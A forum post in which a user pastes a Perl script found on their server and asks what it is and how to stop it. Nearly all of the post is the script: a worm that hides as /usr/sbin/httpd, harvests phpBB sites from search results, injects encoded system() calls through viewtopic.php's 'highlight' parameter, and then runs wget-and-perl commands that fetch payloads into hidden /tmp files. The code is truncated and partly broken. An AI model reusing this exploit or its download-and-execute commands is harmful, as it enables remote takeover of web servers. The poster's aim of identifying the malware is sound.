anyone to tell me what is this
and how to stop it
and how to stop it
use strict;
use IO::Socket;
use IO::Handle;
my $process = '/usr/sbin/httpd';
my $pid=fork;
sub fetch();
sub remote($);
sub http_query($);
sub encode($);
sub fetch(){
my $rnd=(int(rand(9999)));
my $s= (int(rand(1000)));
if ($rnd>1000) { $s= (int(rand(100)))}
my @str=(
my $query="";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/msn|cache|hotmail/){
push (@lst,$1);
return (@lst);
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
my @r = <$sock>;
alarm 0;
return $page;
sub encode($) {
my $s = shift;
$s =~ s/(.)/"chr(".ord($1).")%252E"/seg;
$s =~ s/%252E$//;
return $s;
eval {fork and exit;};
my $iam=$ARGV[0];
my $oneday=time+3600;
my $page="";
my @urls;
my $url;
foreach $url (@urls) {
if ($url !~ /viewtopic.php/) {next;}
$url =~ s/(.*\/viewtopic.php\?[t|p]=[0-9]+).*/$1/;
my $cmd=encode("perl -e \"print q(jSVowMsd)\"");
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
if ( $page =~ /jSVowMsd/ ){
$url =~ s/&highlight.*//;
my $upload=$url;
$upload =~ s/viewtopic.*//;
$cmd="wget [url][/url] -O /tmp/.sql.err.3792 ;perl /tmp/.sql.err.3792"; # set cmd
$cmd=encode("$cmd"); # set cmd
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
$cmd="wget [url][/url] -O /tmp/.sql.err.3913; perl /tmp/.sql.err.3913; touch /tmp/.doente";
$cmd=encode("$cmd"); # set cmd
$url =~ s/&highlight.*//;
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);